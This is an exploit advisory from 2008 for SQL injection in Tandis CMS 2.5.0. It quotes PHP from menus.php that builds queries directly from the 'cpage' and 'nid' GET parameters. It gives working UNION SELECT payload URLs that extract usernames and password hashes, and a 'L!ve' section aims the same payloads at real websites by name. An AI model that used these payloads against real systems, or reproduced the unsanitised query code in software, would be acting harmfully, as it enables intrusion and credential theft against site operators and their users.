-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Tandis CMS <= 2.5.0 Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: 		Tandis CMS v2.5.0
[~] Language : 		PHP
[~] WebSite: 		http://tandiscms.com/
[~] affected File: 	menus.php
[~] Type : 			Commercial
[~] Report-Date : 	27/10/2008

--[ CoDE ]--
[~] index.php
{..}
48	include("./includes/menus.php");
{..}
[~] /includes/menus.php
{...}
27		if (isset($_GET['cpage'])) {
28			$pagecode = $_GET['cpage'];
xx		{...}
40			$result = mysql_query("SELECT * FROM ".$tandisversion."menus where(menuparentcode=".$pagecode."  AND tid=".$_SESSION['curr_tandis_id'].")");
--------------------------
{...}
295				if (!isset($_GET['nid'])) {
296					print "[ERROR] You Change Standard Parameters<br>This System Protected By NNET SECURITY !";				
297					exit();
298				}
299				$page_content = array();
300				$result = mysql_query("SELECT ".$tandisversion."tblnews.*,".$tandisversion."contents.content as cnt FROM ".$tandisversion."tblnews,".$tandisversion."contents where (nid=".$_GET['nid']." AND ".$tandisversion."tblnews.nmessage=".$tandisversion."contents.id)");
{...}

--[ /CoDE ]--

--[ DoRK ]--
WTF...!?
sry kidz...!
no more d0rk.

--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~] http://localhost/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--
[~] http://localhost/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--


--[ L!ve ]--
http://tandiscms.com/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--
http://tandiscms.com/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--
http://www.geomatic.ir/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users--
http://www.geomatic.ir/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>


//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=